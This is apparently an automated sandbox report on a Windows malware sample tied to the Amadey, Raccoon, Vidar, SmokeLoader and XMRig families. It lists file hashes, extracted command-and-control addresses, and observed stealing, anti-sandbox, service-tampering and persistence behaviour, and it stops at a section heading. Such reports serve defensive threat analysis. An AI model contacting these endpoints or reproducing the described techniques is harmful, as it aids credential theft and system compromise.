amadey | 9671026453b91d4fbde7be21bf9c469897673c240a5f1777deca79ce4a5aa451

Analysis

max time kernel
152s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
30-01-2023 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Size

8.0MB
MD5

bf3ba6986c24b775418721fdbbe75f5c
SHA1

a46212c6d3d8329135b4780786b5581c6c2bb5b4
SHA256

2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24
SHA512

cc16a928eb457bccd1a70cb7fd075364f1fa120bbf0ea347f9b4310fda7828807502355d8d209d8fd4c3d664af16732226eacf553d4980f5ee59c8f3409693f5
SSDEEP

196608:5pDVnj97FG29WPpw4xOQiuIQz1wckK2m:5pJnZh4G4xOhuIQzpZ2

Score

10^/10

amadey raccoon smokeloader vidar xmrig 04f8fa0bf52b1b98a127f6deeac54f84 736 backdoor discovery evasion miner spyware stealer trojan upx vmprotect

Malware Config

Extracted

Family

amadey

Version

3.65

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

raccoon

Botnet

04f8fa0bf52b1b98a127f6deeac54f84

http://94.131.3.70/

http://83.217.11.11/

http://83.217.11.13/

http://83.217.11.14/

http://45.15.156.222/

rc4.plain

Extracted

Family

vidar

Version

2.3

Botnet

736

https://t.me/mantarlars

https://steamcommunity.com/profiles/76561199474840123

Attributes

profile_id
736

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4152-197-0x0000000004790000-0x0000000004799000-memory.dmp	family_smokeloader

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	2204	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	2204	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

XandETC.exeupdater.execonhost.exe

description	pid	process	target process
PID 3436 created 676	3436	XandETC.exe	Explorer.EXE
PID 3436 created 676	3436	XandETC.exe	Explorer.EXE
PID 3436 created 676	3436	XandETC.exe	Explorer.EXE
PID 3436 created 676	3436	XandETC.exe	Explorer.EXE
PID 3436 created 676	3436	XandETC.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 4804 created 676	4804	conhost.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE
PID 2148 created 676	2148	updater.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

birge.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ birge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	birge.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp	xmrig
behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

85 2384 rundll32.exe
Downloads MZ/PE file

flow	pid	process
85	2384	rundll32.exe

Executes dropped EXE 18 IoCs

Processes:

Player3.exepb1111.exeslwang.exenbveek.exebirge.exeslwang.exepb1111.exerandom.exerandom.exeXandETC.exeChromeSetup.exedownload.exedownload.exenbveek.exe36A0.exeupdater.exenbveek.exenbveek.exe

pid	process
592	Player3.exe
932	pb1111.exe
1260	slwang.exe
1412	nbveek.exe
3028	birge.exe
1876	slwang.exe
4048	pb1111.exe
3968	random.exe
4608	random.exe
3436	XandETC.exe
4152	ChromeSetup.exe
4216	download.exe
64	download.exe
1260	nbveek.exe
520	36A0.exe
2148	updater.exe
2396	nbveek.exe
4464	nbveek.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp	upx
behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp	upx

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\pb1111.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\pb1111.exe	vmprotect
behavioral2/memory/932-145-0x0000000140000000-0x0000000140618000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe	vmprotect
behavioral2/memory/4048-170-0x0000000140000000-0x000000014061A000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

birge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	birge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	birge.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exePlayer3.exenbveek.exeslwang.exerandom.exedownload.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	Player3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	slwang.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	download.exe

Loads dropped DLL 7 IoCs

Processes:

rundll32.exerundll32.exedownload.exerundll32.exerundll32.exerundll32.exe

pid process

4156 rundll32.exe
2900 rundll32.exe
4216 download.exe
4216 download.exe
960 rundll32.exe
3784 rundll32.exe
2384 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

birge.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA birge.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
4156	rundll32.exe
2900	rundll32.exe
4216	download.exe
4216	download.exe
960	rundll32.exe
3784	rundll32.exe
2384	rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	birge.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

birge.exe

pid process

3028 birge.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

rundll32.exeupdater.exe

description	pid	process	target process
PID 2384 set thread context of 3892	2384	rundll32.exe	rundll32.exe
PID 2148 set thread context of 4804	2148	updater.exe	conhost.exe
PID 2148 set thread context of 4208	2148	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

XandETC.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

756 sc.exe
1388 sc.exe
600 sc.exe
3828 sc.exe
2836 sc.exe
3780 sc.exe
4748 sc.exe
4356 sc.exe
4028 sc.exe
4668 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
756	sc.exe
1388	sc.exe
600	sc.exe
3828	sc.exe
2836	sc.exe
3780	sc.exe
4748	sc.exe
4356	sc.exe
4028	sc.exe
4668	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1280	4156	WerFault.exe	rundll32.exe
5060	2900	WerFault.exe	rundll32.exe
2876	4216	WerFault.exe	download.exe
4832	4216	WerFault.exe	download.exe
2604	3784	WerFault.exe	rundll32.exe
4996	520	WerFault.exe	36A0.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ChromeSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ChromeSetup.exe

Checks processor information in registry 2 TTPs 26 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exedownload.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	download.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	download.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

204 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2208 timeout.exe

pid	process
204	schtasks.exe

pid	process
2208	timeout.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 25 IoCs

Processes:

download.exerundll32.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	download.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2"	Explorer.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
